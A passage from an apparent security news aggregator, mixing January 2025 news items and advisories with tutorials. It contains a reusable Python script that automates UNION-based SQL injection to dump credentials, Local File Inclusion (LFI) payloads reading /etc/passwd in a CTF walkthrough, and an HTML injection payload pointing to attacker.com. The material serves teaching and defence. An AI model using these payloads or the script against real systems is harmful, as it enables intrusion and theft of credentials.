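The column-count, catalog and dump steps above follow one fixed pattern, in the SQLite walkthrough of section 3 as much as in this PortSwigger one, so here is an added example, my own code rather than anything from the labs or from this post, that runs the whole chain off a small table of per-dialect catalog queries: sqlite_master for SQLite, information_schema for MySQL-style databases, all_tables and all_tab_columns (plus FROM dual) for Oracle. The target is abstracted as a probe(payload) callable returning (succeeded, rows); on a real engagement that would wrap an HTTP request and judge success from the response, while the constructed stand-in at the bottom wraps an in-memory SQLite database behind the same unparameterised two-column query as the lab's category filter. The table names, column names and credentials in the demo data are assumptions.

```python
import sqlite3

# Catalog queries per dialect, as used in the walkthroughs. Each entry is
# (expression to select, FROM clause). "dual" is what a FROM-less probe needs.
DIALECTS = {
    "sqlite": {
        "tables":  ("name", "sqlite_master WHERE type='table'"),
        # No column catalog is reachable from a UNION on SQLite; read the
        # CREATE statement instead and parse the column names out of it.
        "columns": ("sql", "sqlite_master WHERE type='table' AND name='{table}'"),
        "concat":  "{a} || ':' || {b}",
        "dual":    None,
    },
    "mysql": {
        "tables":  ("table_name", "information_schema.tables"),
        "columns": ("column_name", "information_schema.columns WHERE table_name='{table}'"),
        "concat":  "CONCAT({a}, ':', {b})",  # || means OR on MySQL, not concatenation
        "dual":    None,
    },
    "oracle": {
        "tables":  ("table_name", "all_tables"),
        "columns": ("column_name", "all_tab_columns WHERE table_name='{table}'"),
        "concat":  "{a} || ':' || {b}",
        "dual":    "dual",                   # every Oracle SELECT needs a FROM clause
    },
}


def build_union(ncols, slot, expr, from_clause=None):
    # A bare quote closes the original literal so its WHERE matches nothing,
    # `expr` goes into position `slot` (NULL elsewhere) and -- drops the rest.
    cols = ["NULL"] * ncols
    cols[slot] = expr
    tail = f" FROM {from_clause}" if from_clause else ""
    return f"' UNION SELECT {','.join(cols)}{tail}-- "


def find_column_count(probe, dual=None, max_cols=12):
    # Add NULLs until the UNION stops erroring; that is the column count.
    for n in range(1, max_cols + 1):
        ok, _ = probe(build_union(n, 0, "NULL", dual))
        if ok:
            return n
    raise RuntimeError(f"no column count up to {max_cols} worked")


def find_string_column(probe, ncols, dual=None, marker="zzqq"):
    # Find a position whose value is rendered back to us as text.
    for slot in range(ncols):
        ok, rows = probe(build_union(ncols, slot, f"'{marker}'", dual))
        if ok and any(marker in str(cell) for row in rows for cell in row):
            return slot
    raise RuntimeError("no column reflects text")


def pull(probe, ncols, slot, expr, from_clause):
    # Send one UNION payload and collect the injected column's values.
    payload = build_union(ncols, slot, expr, from_clause)
    ok, rows = probe(payload)
    if not ok:
        raise RuntimeError("payload rejected: " + payload)
    return [row[slot] for row in rows if row[slot] is not None]


def list_tables(probe, ncols, slot, dialect):
    expr, src = DIALECTS[dialect]["tables"]
    return pull(probe, ncols, slot, expr, src)


def list_columns(probe, ncols, slot, dialect, table):
    expr, src = DIALECTS[dialect]["columns"]
    values = pull(probe, ncols, slot, expr, src.format(table=table))
    if dialect != "sqlite":
        return values
    create = values[0]  # e.g. "CREATE TABLE users (username TEXT, password TEXT)"
    body = create[create.index("(") + 1:create.rindex(")")]
    return [part.strip().split()[0] for part in body.split(",")]


def dump_pairs(probe, ncols, slot, dialect, table, col_a, col_b):
    # Fetch both columns as one value: UNION de-duplicates and may reorder
    # rows, so two separate dumps cannot be paired up reliably.
    expr = DIALECTS[dialect]["concat"].format(a=col_a, b=col_b)
    return pull(probe, ncols, slot, expr, table)


def enumerate_and_dump(probe, dialect, user_table, user_col, pass_col):
    dual = DIALECTS[dialect]["dual"]
    ncols = find_column_count(probe, dual)
    slot = find_string_column(probe, ncols, dual)
    tables = list_tables(probe, ncols, slot, dialect)
    columns = list_columns(probe, ncols, slot, dialect, user_table)
    creds = dump_pairs(probe, ncols, slot, dialect, user_table, user_col, pass_col)
    return ncols, slot, tables, columns, creds


# Constructed offline stand-in for the lab's ?category= endpoint (assumed data).
def make_vulnerable_probe():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (name TEXT, description TEXT, category TEXT);
        INSERT INTO products VALUES ('Mug', 'A mug', 'Gifts');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 's3cret'), ('wiener', 'peter');
    """)

    def probe(injected):
        sql = f"SELECT name, description FROM products WHERE category = '{injected}'"
        try:
            return True, conn.execute(sql).fetchall()
        except sqlite3.Error:
            return False, []  # a live target shows an error page or HTTP 500 instead
    return probe


if __name__ == "__main__":
    print(enumerate_and_dump(make_vulnerable_probe(), "sqlite", "users", "username", "password"))
```

Against the stand-in this finds 2 columns, picks position 0 as the reflected one, lists products and users, parses username and password out of the CREATE statement and returns administrator:s3cret and wiener:peter. Two details carry over to real targets: the injected prefix is a bare quote so that the original WHERE clause returns nothing and only the UNION rows appear, and the concat template is per dialect because the same || that joins strings on SQLite, PostgreSQL and Oracle is a logical OR on MySQL.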
Some additional TRYHACKME free rooms for extra practice on SQL Injection: https://tryhackme.com/r/room/advancedsqlinjection https://tryhackme.com/r/room/sch3mad3mon https://tryhackme.com/r/room/sqhell https://tryhackme.com/r/room/sqlilab https://tryhackme.com/r/room/rabbitholeqq Some good blogs on SQL injection: https://infosecwriteups.com/the-wrath-of-second-order-sql-injection-c9338a51c6d https://www.intigriti.com/researchers/blog/hacking-tools/hacker-tools-sqlmap-finding-sqli-like-a-pro
by HACKLIDO
2025-01-21 20:06:40
Govtech giant Conduent won’t rule out cyberattack as outage drags onAt least four states reported being affected by the outage, which Conduent says is ongoing. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2025-01-21 19:30:00
Mirai Variant Murdoc Botnet Exploits AVTECH IP Cameras and Huawei RoutersCybersecurity researchers have warned of a new large-scale campaign that exploits security flaws in AVTECH IP cameras and Huawei HG532 routers to rope the devices into a Mirai botnet variant dubbed Murdoc Botnet. The ongoing activity "demonstrates enhanced capabilities, exploiting vulnerabilities to compromise devices and establish expansive botnet networks," Qualys security researcher Shilpesh
by The Hacker News
2025-01-21 19:15:33
Redline, Vidar and Raccoon Malware Stole 1 Billion Passwords in 2024Specops 2025 Breached Password Report reveals over 1 billion passwords stolen by malware in the past year, exposing…
by Hackread
2025-01-21 18:16:00
13,000 MikroTik Routers Hijacked by Botnet for Malspam and CyberattacksA global network of about 13,000 hijacked MikroTik routers has been employed as a botnet to propagate malware via spam campaigns, the latest addition to a list of botnets powered by MikroTik devices. The activity "take[s] advantage of misconfigured DNS records to pass email protection techniques," Infoblox security researcher David Brunsdon said in a technical report published last week. "This
by The Hacker News
2025-01-21 18:09:18
Mirai Botnet Spinoffs Unleash Global Wave of DDoS AttacksTwo separate campaigns are targeting flaws in various IoT devices globally, with the goal of compromising them and propagating malware worldwide.
by Dark Reading
2025-01-21 17:02:00
How to tell if an AirTag is secretly tracking you - and what to do about itApple's trackers have been misused to track some people without their consent. Here's how to check if an AirTag is tracking you, whether you use an iPhone or Android phone. Plus, what to do next if you find one.
by ZDNET Security
2025-01-21 17:00:00
Why maintaining data cleanliness is essential to cybersecurityData, in all its shapes and forms, is one of the most critical assets a business possesses. Not only does it provide organizations with critical information regarding their systems and processes, but it also fuels growth and enables better decision-making on all levels. However, like any other piece of company equipment, data can degrade over […] The post Why maintaining data cleanliness is essential to cybersecurity appeared first on Security Intelligence.
by Security Intelligence
2025-01-21 16:51:58
Cloudflare Reports Record-Breaking 5.6 Tbps DDoS AttackCloudflare has revealed that it mitigated the largest Distributed Denial-of-Service (DDoS) attack ever recorded, peaking at 5.6 Terabits per second (Tbps) during the last quarter of 2024. This hyper-volumetric attack, alongside a staggering 53% annual increase in DDoS incidents, underscores the growing scale and sophistication of cyber threats worldwide. The attack on October 29, 2024, … The post Cloudflare Reports Record-Breaking 5.6 Tbps DDoS Attack appeared first on CyberInsider.
by Cyber Insider
2025-01-21 16:48:11
TikTok Alternative ‘RedNote’ Is Leaking User Data in PlaintextA security investigation has revealed that Xiaohongshu, also known as RedNote, a social media platform similar to TikTok, transmits user data in plaintext, exposing users' viewing and search histories to potential eavesdroppers. The flaw, discovered by security researchers at Corrata, highlights ongoing concerns about data security on Chinese-owned digital platforms, particularly as American users seek … The post TikTok Alternative ‘RedNote’ Is Leaking User Data in Plaintext appeared first on CyberInsider.
by Cyber Insider
2025-01-21 16:41:05
New Mirai botnet variant Murdoc Botnet targets AVTECH IP cameras and Huawei HG532 routersResearchers warn of a campaign exploiting AVTECH IP cameras and Huawei HG532 routers to create a Mirai botnet variant called Murdoc Botnet. Murdoc Botnet is a new Mirai botnet variant that targets vulnerabilities in AVTECH IP cameras and Huawei HG532 routers, the Qualys Threat Research Unit reported. The botnet has been active since at least […]
by Security Affairs
2025-01-21 16:22:00
Ex-CIA Analyst Pleads Guilty to Sharing Top-Secret Data with Unauthorized PartiesA former analyst working for the U.S. Central Intelligence Agency (CIA) pleaded guilty to transmitting top secret National Defense Information (NDI) to individuals who did not have the necessary authorization to receive it and attempted to cover up the activity. Asif William Rahman, 34, of Vienna, was an employee of the CIA since 2016 and had a Top Secret security clearance with access to
by The Hacker News
2025-01-21 16:07:51
New Mirai Variant Murdoc_Botnet Launches DDoS Attacks via IoT ExploitsThis article explores the recent campaign of Murdoc_Botnet, a malware variant of Mirai targeting vulnerable AVTECH and Huawei…
by Hackread
2025-01-21 16:04:09
Cloudflare mitigated a record-breaking 5.6 Tbps DDoS attackThe largest distributed denial-of-service (DDoS) attack to date peaked at 5.6 terabits per second and came from a Mirai-based botnet with 13,000 compromised devices. [...]
by BleepingComputer
2025-01-21 16:00:00
HackGATE: Setting New Standards for Visibility and Control in Penetration Testing ProjectsImagine receiving a penetration test report that leaves you with more questions than answers. Questions like "Were all functionalities of the web app tested?" or "Were there any security issues that could have been identified during testing?" often go unresolved, raising concerns about the thoroughness of the security testing. This frustration is common among many security teams. Pentest
by The Hacker News
2025-01-21 15:47:05
SandboxAQ Partners with Google Cloud to Advance Quantitative AI in Enterprise ApplicationsSandboxAQ is teaming up with Google Cloud to revolutionise how Large Quantitative Models (LQMs) are developed, integrated, and deployed in enterprise environments. The partnership will see SandboxAQ utilize Google Cloud’s advanced infrastructure as its preferred cloud platform and leverage the Google Cloud Marketplace to streamline access to its cutting-edge solutions. SandboxAQ’s LQMs are at the […] The post SandboxAQ Partners with Google Cloud to Advance Quantitative AI in Enterprise Applications appeared first on IT Security Guru.
by IT Security Guru
2025-01-21 15:07:41
Cisco Previews AI Defenses to Cloud Security PlatformSet for release in March, Cisco AI Defense will provide algorithmic red teaming of large language models with technology that came over as part of the Robust Intelligence acquisition last year.
by Dark Reading
2025-01-21 15:00:00
Why CISOs Must Think Clearly Amid Regulatory ChaosEven as the rule book changes, the profession of the CISO remains unchanged: protecting the organization in a world of constant, continually evolving threats.
by Dark Reading
2025-01-21 14:58:20
Fake Homebrew Google ads target Mac users with malwareHackers are once again abusing Google ads to spread malware, using a fake Homebrew website to infect Macs and Linux devices with an infostealer that steals credentials, browser data, and cryptocurrency wallets. [...]
by BleepingComputer
2025-01-21 14:50:38
The Complete Guide to NTFS vs Share PermissionsThis post first appeared on blog.netwrix.com and was written by Dirk Schrader.The foundation of Windows security is simple — if you want access to a network resource such as a file or folder, you need the appropriate permissions. But implementation is more complex because the Windows operating system has two types of permissions: NTFS permissions, which operate at the file system level, and share permissions, which … Continued
by Netwrix
2025-01-21 14:33:39
Toronto school district says 40 years of student data stolen in PowerSchool breachCanada’s largest school board says hackers may have accessed some 40 years’ worth of student data during the recent PowerSchool breach. In a letter sent to parents this week, the Toronto District School Board (TDSB) said that the data breach affected all students enrolled in the district between September 1985 and December 2024. The school […]
by TechCrunch
2025-01-21 14:10:04
AI tool GeoSpy analyzes images and identifies locations in secondsForget OSINT, AI-supported tool GeoSpy can determine a person''s location based on their surroundings in a picture.
by Malwarebytes Labs
2025-01-21 14:00:00
Record-breaking 5.6 Tbps DDoS attack and global DDoS trends for 2024 Q42024 ended with a bang. Cloudflare mitigated another record-breaking DDoS attack peaking at 5.6 Tbps.
by Cloudflare
2025-01-21 14:00:00
CyberheistNews Vol 15 #03 Waging War on Explicit Deepfakes. The Real Problem Behind the UK Crackdown.
by KnowBe4
2025-01-21 14:00:00
Are attackers already embedded in U.S. critical infrastructure networks?The threat of cyberattacks against critical infrastructure in the United States has evolved beyond data theft and espionage. Intruders are already entrenched in the nation’s most vital systems, waiting to unleash attacks. For instance, CISA has raised alarms about Volt Typhoon, a state-sponsored hacking group that has infiltrated critical infrastructure networks. Their goal? To establish […] The post Are attackers already embedded in U.S. critical infrastructure networks? appeared first on Security Intelligence.
by Security Intelligence
2025-01-21 14:00:00
The New Face of Ransomware: Key Players and Emerging Tactics of 2024As we step into 2025, the high-impact, financially motivated ransomware landscape continues to evolve, shaped by a combination of law enforcement actions, shifting affiliate dynamics, advancements in defensive approaches, and broader economic and geopolitical influences.
by SpiderLabs Blog
2025-01-21 13:50:00
The fall and rise of TikTok (traffic)On January 19, 2025, ByteDance suspended TikTok and related apps for US users. We examine the 14-hour traffic plunge, recovery near Donald Trump’s inauguration.
by Cloudflare
2025-01-21 13:34:37
Infrastructure Defense: Communications systemsThe Communications Sector is a key enabler of all other infrastructure sectors in the United States, and it''s under continuous attack by foreign threat actors.
by Barracuda
2025-01-21 13:22:35
Tunneling Flaws Put VPNs, CDNs and Routers at Risk GloballyMillions of devices, including home routers, VPN servers, and CDNs are vulnerable to exploitation due to critical flaws…
by Hackread
2025-01-21 13:11:41
Critical Mozilla Vulnerabilities Prompt Urgent Updates for Firefox and Thunderbird Users
Mozilla Firefox and Thunderbird users are facing a series of high-severity vulnerabilities that could leave systems open to exploitation. The Indian Computer Emergency Response Team (CERT-In) issued an advisory on January 20, 2025, highlighting multiple security flaws in Mozilla's popular browser and email client. These Mozilla vulnerabilities, which affect both desktop and mobile versions, could lead to arbitrary code execution, system instability, and privilege escalation. Mozilla has already released patches to address these issues, and users are urged to update their software immediately.

Mozilla Vulnerabilities Target Unsuspecting Victims
The vulnerabilities in Mozilla products affect various versions of Firefox and Thunderbird, including both standard and Extended Support Release (ESR) versions. Specifically, the flaws impact the following:
- Mozilla Firefox versions prior to 134
- Mozilla Firefox ESR versions prior to 128.6 and 115.19
- Mozilla Thunderbird versions prior to 134
- Mozilla Thunderbird ESR versions prior to 128.6 and 115.19
These vulnerabilities are critical, as they present a serious risk to both individual users and enterprises that rely on Mozilla's software for everyday browsing and communication. Without patching, attackers could exploit these vulnerabilities to gain unauthorized access, execute arbitrary code, or cause significant system disruptions.

Overview of Mozilla Vulnerabilities
A range of vulnerabilities has been identified across Mozilla Firefox and Thunderbird, potentially allowing remote attackers to perform malicious actions such as code execution, denial of service (DoS) attacks, or bypassing security restrictions. These vulnerabilities stem from weaknesses in core components of the software, including the WebChannel API and memory safety protocols. The issues identified are significant because they can be exploited without direct interaction from the attacker, making them even more dangerous.

Key Vulnerabilities and Their Impact
Some of the most critical vulnerabilities found in Mozilla Firefox and Thunderbird include the following:
- CVE-2025-0244: a high-impact vulnerability in Firefox for Android that allows attackers to spoof the address bar, misleading users into believing they are visiting a legitimate website. This flaw significantly increases the risk of phishing attacks and other malicious activities, potentially compromising user security.
- CVE-2025-0245: a moderate-impact vulnerability in Firefox Focus for Android. This flaw allows attackers to bypass the lock screen settings, which are meant to secure the app. As a result, unauthorized individuals could gain access to the application, potentially compromising user privacy and security.
- CVE-2025-0237: a moderate-impact vulnerability in the WebChannel API, which is used for inter-process communication in both Firefox and Thunderbird. The issue arises because the WebChannel API failed to properly validate the sender's principal, enabling attackers to escalate their privileges and gain unauthorized access to the affected system.
- CVE-2025-0239: a moderate-impact vulnerability caused by a flaw in the handling of JavaScript text segmentation. This issue could lead to memory corruption, potentially resulting in system crashes or allowing remote code execution, thereby compromising the security of the affected system.
- CVE-2025-0242: several memory safety bugs found in both Firefox and Thunderbird, which pose a high security risk. If exploited, these vulnerabilities could enable remote attackers to execute arbitrary code, potentially compromising the affected system's security and integrity.

Mozilla's Response and Patches
In response to these vulnerabilities, Mozilla has issued security patches for the following versions:
- Mozilla Firefox 134
- Mozilla Thunderbird 134
- Firefox ESR 115.19 and 128.6
- Thunderbird ESR 115.19 and 128.6
Users are strongly encouraged to update to these versions as soon as possible. These patches address the critical issues and provide improved system stability.

Conclusion
The vulnerabilities in Mozilla Firefox and Thunderbird highlight the need for quick action to protect systems. Users should update to the latest versions, monitor for suspicious activity, and enable security features like multifactor authentication. Applying patches and following best practices can reduce exposure to these risks. For businesses, advanced threat detection tools like Cyble's can further enhance security.
by The Cyber Express
2025-01-21 12:50:47
JoCERT Issues Warning on Exploitable Command Injection Flaws in HPE Aruba Products
Overview
JoCERT has issued an alert regarding critical command injection vulnerabilities discovered in HPE Aruba's 501 Wireless Client Bridge. The vulnerabilities, tracked as CVE-2024-54006 and CVE-2024-54007, allow authenticated attackers with administrative privileges to execute arbitrary commands on the device's underlying operating system. These flaws have been rated as high severity (CVSS score: 7.2) and pose a significant risk if left unaddressed. A publicly released proof-of-concept (PoC) exploit further amplifies the urgency for organizations using affected devices to take immediate action.

Vulnerabilities Overview
HPE Aruba Networking has confirmed the existence of multiple command injection vulnerabilities in the web interface of the 501 Wireless Client Bridge. Below is a detailed breakdown of these vulnerabilities:
- CVE-2024-54006: Exploitation enables attackers to execute arbitrary commands as privileged users.
- CVE-2024-54007: Similarly, this flaw allows attackers to run commands remotely with administrative credentials.
Both vulnerabilities:
- Require administrative authentication credentials to exploit.
- Allow attackers to gain full control over the device upon successful exploitation.
- Impact the confidentiality, integrity, and availability of the device.

Affected Software Versions
The vulnerabilities affect the following software versions:
- HPE Aruba 501 Wireless Client Bridge: Versions V2.1.1.0-B0030 and below.
Devices running software versions higher than V2.1.2.0-B0033 are not impacted. Any other HPE Aruba Networking products not explicitly mentioned remain unaffected.

Severity and Exploitability
- Severity: High (CVSS score: 7.2)
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
- Exploitability: Exploitation requires authenticated administrative credentials. However, once exploited, attackers gain full control of the device, potentially enabling malicious activities such as data exfiltration, lateral movement, and network disruption.
- Public Discussion: A proof-of-concept exploit script has been released publicly, making these vulnerabilities more accessible to attackers.

Mitigation and Recommendations
To safeguard against these vulnerabilities, organizations should follow these steps:
- Upgrade to a Fixed Version: Update affected devices to software version V2.1.2.0-B0033 or later. The fixed software can be downloaded from the HPE Networking Support Portal.
- Restrict Management Interfaces: Limit access to the Command Line Interface (CLI) and web-based management interfaces to a dedicated Layer 2 VLAN or secure them with Layer 3 firewall policies.
- Audit Network Devices: Conduct a thorough security audit of all Aruba devices within your network to identify any unauthorized access or misconfigurations.
- Strengthen Authentication Mechanisms: Enforce strong administrative passwords and regularly rotate administrative credentials to minimize the risk of unauthorized access.
- Monitor for Suspicious Activity: Implement robust monitoring to detect any unusual or unauthorized access attempts to the 501 Wireless Client Bridge.
- Stay Informed: Subscribe to HPE's Security Bulletin alerts to receive updates about future vulnerabilities and patches.

Technical Details of the Vulnerabilities
CVE-2024-54006
Description: Multiple command injection vulnerabilities exist in the web interface of the 501 Wireless Client Bridge, allowing attackers to execute arbitrary commands as a privileged user. Exploitation requires administrative authentication credentials.
CVSS Base Score: 7.2
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVE-2024-54007
Description: Similar to CVE-2024-54006, this vulnerability allows authenticated attackers to execute commands on the device's underlying operating system via the web interface.
CVSS Base Score: 7.2
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Both vulnerabilities were discovered and reported by Nicholas Starke of HPE Aruba Networking SIRT and Hosein Vita.

Workarounds
For organizations unable to immediately update to the fixed version, the following workarounds are recommended:
- Restrict Network Access: Isolate the device management interfaces to a secure VLAN or subnet.
- Firewall Rules: Configure Layer 3 and above firewall policies to limit access to the management interfaces.
- Monitoring and Logging: Enable detailed logging to monitor for unusual administrative activities.
These workarounds are temporary and should not replace patching, which is the most effective mitigation strategy.

Final Notes
These command injection vulnerabilities in HPE Aruba's 501 Wireless Client Bridge underline the importance of proactive cybersecurity practices. With the rise of publicly disclosed exploits, organizations must act quickly to mitigate risks by updating vulnerable devices, monitoring for threats, and enforcing strict access controls. Failure to address these vulnerabilities could result in compromised devices, data breaches, and disrupted operations. Take immediate action to protect your network and maintain the integrity of your systems.
Source:
https://jocert.ncsc.jo/EN/ListDetails/Security_Alerts__Advisorites/1203/87
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04763en_us&docLocale
The post JoCERT Issues Warning on Exploitable Command Injection Flaws in HPE Aruba Products appeared first on Cyble.
by CYBLE
2025-01-21 12:34:59
CERT-UA warned of scammers impersonating the agency using fake AnyDesk requests
CERT-UA warned of scammers impersonating the agency, using fake AnyDesk requests to conduct fraudulent security audits. The Computer Emergency Response Team of Ukraine (CERT-UA) warned of cyber scams involving threat actors impersonating the agency by sending fraudulent AnyDesk connection requests under the guise of security audits. CERT-UA pointed out that it uses the software AnyDesk […]
by Security Affairs
2025-01-21 11:40:43
Lo-Fi — TryHackMe CTF Walkthrough For Beginners | By Pranav S V | Jan, 25
Introduction
Hello, hackers! Today, we will solve the TryHackMe CTF called "Lo-Fi." As we progress, we will explain the topics and techniques used in the CTF. Let's get started!

Local File Inclusion and File Path Traversal
Before starting the CTF, you need to understand the topic of Local File Inclusion (LFI). So, what exactly is Local File Path Traversal?
Let me first explain Local File Inclusion. It is a process in which we exploit the ability to include local server files and execute them on the server. This allows us to access system files we are normally restricted from accessing.
Eg: index.php?page=/etc/passwd or index.php?page=../../config.php
Path Traversal, on the other hand, is an exploit that allows us to manipulate the file path mentioned in the URL to gain unauthorized access to restricted areas.
Eg: ../../etc/passwd

Task 1:
Want to hear some lo-fi beats, to relax or study to? We've got you covered!
Access this challenge by deploying both the vulnerable machine by pressing the green "Start Machine" button located within this task, and the TryHackMe AttackBox by pressing the "Start AttackBox" button located at the top-right of the page.
Navigate to the following URL using the AttackBox: http://MACHINE_IP and find the flag in the root of the filesystem.
Check out similar content on TryHackMe:
- LFI Path Traversal
- File Inclusion
Note: The web page does load some elements from external sources. However, they do not interfere with the completion of the room.
Answer the questions below:
1. Climb the filesystem to find the flag!
flag{e4478e0eab69bd642b8238765dcb7d18}

Explanation
This link http://10.10.118.152 redirected me to this page:
On the site, there are some options, and when I explored them, I ended up here:
The interesting part here is the URL, which has a file inclusion vulnerability that we can exploit to traverse across the files in the system. To confirm if it works, we can start by checking the contents of the /etc/passwd file. You can use this payload to check it:
../../../../etc/passwd
Yes, it's working, so now we can traverse and find the flag content. After crafting some payloads, I found the correct one. It is:
../../../../flag.txt
So, that's all.
Feel free to follow me for more content, and join our discord community for cybersecurity enthusiasts: https://discord.gg/bqVMEFUuHM
Lo-Fi — TryHackMe CTF Walkthrough For Beginners | By Pranav S V | Jan, 25 was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
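As a defender's counterpart to the include pattern the walkthrough exploits, the following added example (not part of the original post) shows a page-include routine that resolves the page parameter inside one fixed pages directory and rejects the ../ payloads quoted above. The demo site layout, file names and the pages directory are constructed for the example.

```python
"""Hardened page include: resolve the user-supplied `page` value inside a
fixed directory and refuse anything that escapes it.

Added example, not code from the walkthrough or from TryHackMe. The demo
site (pages/home.html, pages/about.html, ../flag.txt) is constructed.
"""
import tempfile
from pathlib import Path


class TraversalError(ValueError):
    """Raised when a requested path resolves outside the pages directory."""


def safe_page_path(pages_dir: Path, requested: str) -> Path:
    """Resolve `requested` under pages_dir; raise TraversalError if it escapes."""
    if "\x00" in requested:
        raise TraversalError("NUL byte in path")
    base = pages_dir.resolve()
    # Drop a leading slash so an absolute value such as /etc/passwd is
    # interpreted relative to the pages directory instead of the filesystem root.
    candidate = (base / requested.lstrip("/\\")).resolve()
    # Compare fully resolved paths: this defeats ../ sequences and symlinks alike,
    # because resolve() collapses them before the containment check.
    if candidate != base and base not in candidate.parents:
        raise TraversalError(f"path escapes pages directory: {requested}")
    return candidate


def include_page(pages_dir: Path, requested: str) -> str:
    """Return the page body for a `page` parameter, or raise on traversal/missing file."""
    path = safe_page_path(pages_dir, requested)
    if not path.is_file():
        raise FileNotFoundError(requested)
    return path.read_text()


def build_demo_site() -> Path:
    """Create a throwaway site: two includable pages and a file one level above them."""
    root = Path(tempfile.mkdtemp())
    pages = root / "pages"
    pages.mkdir()
    (pages / "home.html").write_text("<h1>Lo-Fi beats</h1>")
    (pages / "about.html").write_text("<h1>About</h1>")
    (root / "flag.txt").write_text("not reachable through the include")
    return pages


def classify(pages_dir: Path, requested: str) -> str:
    """Return 'served', 'blocked' or 'missing' for one page parameter value."""
    try:
        include_page(pages_dir, requested)
        return "served"
    except TraversalError:
        return "blocked"
    except FileNotFoundError:
        return "missing"


if __name__ == "__main__":
    site = build_demo_site()
    # The two traversal payloads from the walkthrough are blocked; the absolute
    # path is re-rooted under pages/ and simply does not exist there.
    for param in ["home.html", "../flag.txt", "../../../../etc/passwd",
                  "/etc/passwd", "nope.html"]:
        print(f"{param:26} -> {classify(site, param)}")
```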
by InfoSec Write-ups
2025-01-21 11:40:16
Hacking EscapeTwo on HackTheBox: A Step-by-Step OSCP Journey
More active directory fun…Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-01-21 11:34:55
WIFI Hacking , user and password hacking [How hackers get Password of any wifi network]
Hi Horbio this side , I hope you are doing well. I know you want to get password their neighbour's wifi that's why you are here. Don't…Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-01-21 11:34:25
Found HTML Injection in Emails! Earned HOF
Hello Hackers, in this quick writeup I am going to disclose my recent finding of HTMLI in email in Quickreel through the comolho bug bounty platform.
So, during testing of the signup feature I found that the full name field was vulnerable to HTML injection, so below are the steps of how I performed the attack.
Steps to Reproduce
1. Visit: https://app.quickreel.io/login
2. Now click on the Register button.
3. Now in the name field add the following payload
Payload: <a href="https://attacker.com"> <img src="https://shorturl.at/CsAH1" width="200"> </a> <!--
4. Now enter the email in which you want to execute the payload and then, after entering the password, click on submit.
And the victim got this in their email:
Mitigations for HTMLI:
- Sanitize User Input: Ensure all user inputs are stripped of HTML or JavaScript before rendering in email templates. Libraries like DOMPurify can help sanitize input effectively.
- Encode Output: Encode special characters in emails to prevent browser rendering.
- Restrict Input Fields: Enforce character length limits and only allow plain text where HTML is unnecessary.
- Validate Content: Conduct regular audits of email templates to ensure no unsafe content injection occurs.
- Use Security Headers: Implement Content Security Policy (CSP) to block rendering of malicious scripts in emails.
And as expected, again this report was also closed as Duplicate 😥 but they still awarded me HOF for securing them and listed my name in their bug bounty hof section 🥳.
Rewarded HOF in Quickreel bug bounty program
I don't know, but till now none of my reports was triaged! 2 are closed as Duplicates and 1 was closed as NA and 3 are still pending from 16th Dec. I don't know why this is happening 😕 on this platform.
Timeline:
16–12–2024: Reported
06–01–2025: Closed as Duplicate
06–01–2025: Awarded HOF
Thank you for reading. I will see you in the next amazing one. Bye 👋
🚨 Found HTML Injection in Emails! Earned HOF 🏆 was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2025-01-21 11:32:26
Splunk Series: Forwarding Logs Using Universal Forwarder (Part 2)
Hello, my digital adventurers. This is the 2nd part of my Splunk series. In this blog, I will show you how to send logs to the Splunk…Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-01-21 11:30:14
Sophos MDR tracks two ransomware campaigns using “email bombing,” Microsoft Teams “vishing”
Sophos MDR identifies a new threat cluster riffing on the playbook of Storm-1811, and amped-up activity from the original connected to Black Basta ransomware.
by Sophos News
2025-01-21 11:21:22
HPE investigating security breach after hacker claims theft of sensitive data
A well-known hacker claims to have stolen source code and user data from the enterprise IT giant.
by TechCrunch
2025-01-21 11:15:00
PNGPlug Loader Delivers ValleyRAT Malware Through Fake Software Installers
Cybersecurity researchers are calling attention to a series of cyber attacks that have targeted Chinese-speaking regions like Hong Kong, Taiwan, and Mainland China with a known malware called ValleyRAT. The attacks leverage a multi-stage loader dubbed PNGPlug to deliver the ValleyRAT payload, Intezer said in a technical report published last week. The infection chain commences with a phishing
by The Hacker News
2025-01-21 11:12:45
How to download, install, and update Kaspersky apps for Android | Kaspersky official blog
How to download, install, and update Kaspersky apps for Android from alternative stores.
by Kaspersky
2025-01-21 11:00:00
7 Common Pitfalls in Data Science Projects — and How to Avoid Them
From low-quality data to unclear goals and poor collaboration, learn how to sidestep the key challenges that can derail your data science initiatives.
by ITPro Today
2025-01-21 11:00:00
Data Storage and Analytics Trends and Predictions 2025 From Industry Insiders
IT leaders and industry insiders share their data storage, management, and analytics trends and predictions for 2025.
by ITPro Today
2025-01-21 10:57:00
CERT-UA Warns of Cyber Scams Using Fake AnyDesk Requests for Fraudulent Security Audits
The Computer Emergency Response Team of Ukraine (CERT-UA) is warning of ongoing attempts by unknown threat actors to impersonate the cybersecurity agency by sending AnyDesk connection requests. The AnyDesk requests claim to be for conducting an audit to assess the "level of security," CERT-UA added, cautioning organizations to be on the lookout for such social engineering attempts that seek to
by The Hacker News
2025-01-21 10:25:18
High Severity Vulnerability Discovered in CP Plus Router: Immediate Attention Needed
A security vulnerability has been identified in the CP Plus CP-XR-DE21-S Router, which could potentially expose sensitive user information and compromise system integrity. This CP Plus Router vulnerability, categorized under the CERT-In Vulnerability Note CIVN-2025-0005, was disclosed on January 20, 2025. Its severity rating is classified as "HIGH," indicating the critical nature of the threat. The vulnerability, which affects the router's firmware version DE21_S_india_hx806_1.057.043_0023, poses a risk to both home users and small-office administrators relying on CP Plus for their 4G LTE connectivity.

The CP Plus Router Vulnerability
